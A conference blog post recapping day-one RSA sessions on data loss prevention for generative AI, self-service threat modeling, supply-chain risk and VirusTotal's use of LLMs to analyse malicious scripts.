The first day of RSA reveals that the AI hype continues. Last year, ChatGPT and XDR were the most mentioned topics. This year, there’s no mention of XDR (or Next Gen SIEM), but about 60% of all track sessions have the word AI in the title, including 3 out of the 5 sessions I attended today.
My focus at this RSA is to learn more about Data Loss Prevention, 3rd party risk, and threat intel. When selecting the track sessions, I chose based on whether the session would be directly usable in my work. Here are the sessions I joined today:
- Use generative AI to end your love hate relationship with DLP
- Redefining Threat modeling: Security Team goes on vacation
- Can you spot a fake? AI and Cyber Risk in Luxury Retail
- What hacking the planet taught us about defending supply chain attacks
- How AI is changing the malware landscape
Overall, the start of the conference was great. Most sessions met the expectations, and some even exceeded them.
Use Generative AI to End Your Love/Hate Relationship with AI
The first talk today was given by Heidi Shey, an analyst at Forester specialized in DLP. The topic was how to apply DLP (Data Loss Prevention) on AI, not as I initially expected based on the title how to use generative AI in your DLP program.
Heidi defines four ways companies are using GenAI:
- Bring Your Own AI (BYOAI), people use their own tools such as ChatGPT in their work
- Embedded in other software
- Tuning and engineering a pre-trained model
- A completely custom model
All of these uses need a different approach from DLP perspective. For example, many companies initially block BYOAI, however it is impossible to keep people from using it, and it would be better to put controls in place. Proposed controls are: creating visibility in the frequency of use and popularity of different GPT tools and create policy and training for employees around that. In addition, you could control block certain prompts using traditional DLP tooling.
For AI embedded in software you will need to rely more on third party risk management tools, access control and data classification. Where for the last two approaches you will need that with in addition measures around your training data, pipelines, etc.
Overall, this talk provided some good insights. If you have the opportunity, I would definitely recommend watching the recording of this session.
Redefining Threat Modeling: Security Team goes on Vacation
Jeevan Sigh, an expert in implementing Threat Modeling within organizations, delivered this talk. In this session, he shared an approach on how to shift left and train engineering teams to perform their own threat modeling with minimal involvement needed from the security team.
Before delving into his approach, he defined four levels of maturity for threat modeling:
- No threat modeling
- Foundational: threat modeling is performed, but mostly on ad-hoc basis
- Scaled maturity: threat modeling is done on a systematic basis
- Bleeding edge: most of the work is automated
Attempting to shift left only makes sense if you have a higher maturity in your threat modeling approach. You will first need to ensure that threat modeling is performed in your organization and that people understand the benefits before moving to a self-service approach.
Jeevan outlined the steps to set up a self-service threat modeling program in your organization. He defined the following steps:
- Training phase: engage in interactive sessions with small groups of engineers (around 6 to 10 people). Over a period of 6 weeks, conduct multiple sessions to introduce the concept of threat modeling, perform hands-on exercises, and conduct the first threat modeling session with them on a system they know.
- Observation phase: take a step back and let the engineers lead a threat modeling session. The security team joins to observe and coach. The engineers’ ability to identify critical and high-risk vulnerabilities is crucial.
- Review phase: if the engineers were able to perform a threat model in the observation phase without missing any major vulnerabilities, you can move to this phase. Here, the engineers will perform the threat modeling sessions on their own, and the security team will review the created threat model after the sessions to verify that no major risks were missed.
- Security optional phase: this is the ideal scenario where everything is done by engineering, and the security team is optional.
For more information, you can read the Blog Post by Jeevan on his approach and find the training materials he uses to train engineering teams to perform their own threat modeling:
This was a great session, and Jeevan shared some valuable lessons learned, wins, and challenges.
Can you spot a fake? AI and Cyber Risks in Luxury Retail
This panel session featured Joseph Szczerba from the FBI interviewing Nicole Darden Fort, CISO of Nordstrom, and Lauren Heyndrickx, CISO of Ralph Lauren. I anticipated a discussion on counterfeit products, fake ecommerce stores, and the use of AI to detect and prevent these risks based on the session’s title and description. However, the actual session focused on the general topic of leveraging AI in business and implementing proper governance around these tools. Frankly, I found this session disappointing as it did not offer any new or interesting insights. It simply reiterated the same generic advice that is commonly given. From that perspective, any CISO could have participated in the panel, and no specific threats or approaches for the (luxury) retail industry were discussed.
Based on this, I would not recommend viewing the recording of this session.
What Hacking the Planet Taught us about defending Supply Chain Attacks
Douglass McKee and Ismael Valenzuela, both instructors at SANS and experienced in offensive security, presented this session. They discussed an approach for managing third-party vendors and libraries to reduce associated risks.
Douglass and Ismael began by defining two types of supply chain risks:
- External vendor: when a product you purchase is compromised due to a breach of the vendor
- Library or Software Development Kit used by one of your own products that contains a vulnerability
They introduced the Overall Product Security Assessment process defined by SANS, which details the exact process for determining the functionality of a library or product and creating a threat model based on that. The threat model can then be used to define actions to mitigate risk.
While the session was informative and engaging, I have reservations about the practicality of the approach, especially for less advanced organizations. Although the approach is ideal, it may be infeasible to implement for more than just your most critical applications. Nonetheless, I believe it is worthwhile to watch the recording of the session if you have the opportunity.
How AI is Changing the Malware Landscape
Vicente Diaz, a Google employee working with Virus Total, presented the last session of the day. During the session, he demonstrated the use of GenAI by VirusTotal to detect malicious scripts and highlighted the (in)effectiveness of GenAI in creating malware.
VirusTotal introduced a Large Language Model (LLM) in a feature called Code Insight. This feature provides a brief description generated by an LLM to explain the functionality of the uploaded file. Code Insight offers users additional information beyond the outcomes of traditional antivirus tools that VirusTotal checks. This can be particularly useful in cases where a script, for example, downloads and executes a file. Such scripts can be malicious, but legitimate installers may exhibit similar behavior.
Building on the experience with Code Insight, VirusTotal also began experimenting with LLMs to detect malware in scripts. From these experiments, they drew the following conclusions:
- LLMs are highly effective at identifying the programming language and file type based on a clear text file.
- LLMs are better at analyzing obfuscated files than traditional antivirus tools. For instance, they found that LLMs performed as well as antivirus tools for PowerShell and Office Macros, but significantly better for other scripting languages such as PHP.
However, they encountered some challenges. Since LLMs analyze patterns in a script, as well as variable names and comments, attackers can influence the prompts and outcomes generated by the LLM by adding specifically crafted comments and variable names.
Overall, I found this talk moderately interesting. There were some intriguing insights into how VirusTotal uses LLMs to analyze scripts. However, I have doubts about the research methodology used. For example, the speaker mainly focused on true positives but did not report on false positives. Additionally they only compared LLMs to traditional anti-virus tooling and I wonder how it would compare to more modern EDR solutions such as Crowdstrike, Microsoft Defender and SentinelOne.
Leave a Reply